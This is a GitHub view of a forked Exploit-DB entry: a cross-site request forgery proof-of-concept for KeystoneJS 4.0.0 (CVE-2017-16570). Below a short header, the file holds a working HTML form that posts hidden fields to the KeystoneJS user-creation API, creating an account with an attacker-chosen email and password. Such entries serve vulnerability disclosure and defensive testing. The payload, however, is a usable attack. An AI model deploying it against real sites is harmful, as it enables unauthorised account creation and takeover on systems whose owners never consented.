forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy path43922.html
More file actions
29 lines (24 loc) · 867 Bytes
/
Copy path43922.html
File metadata and controls
29 lines (24 loc) · 867 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Exploit Title: Application wide CSRF Bypass
# Date: Sep, 2017
# Exploit Author: Saurabh Banawar
# Vendor Homepage: http://keystonejs.com/
# Software Link: https://github.com/keystonejs/keystone
# Version: 4.0.0
# Tested on: Windows 8.1
# CVE : 2017-16570
Link: https://vuldb.com/?id.109170
Exploit:
<html>
<body>
<form action="http://127.0.0.1:3000/keystone/api/users/create" method="POST"
enctype="multipart/form-data">
<input type="hidden" name="name.first" value="Saurabh" />
<input type="hidden" name="name.last" value="Banawar" />
<input type="hidden" name="email"
value="saurabh.banawar@securelayer7.net" />
<input type="hidden" name="password" value="test" />
<input type="hidden" name="password_confirm" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>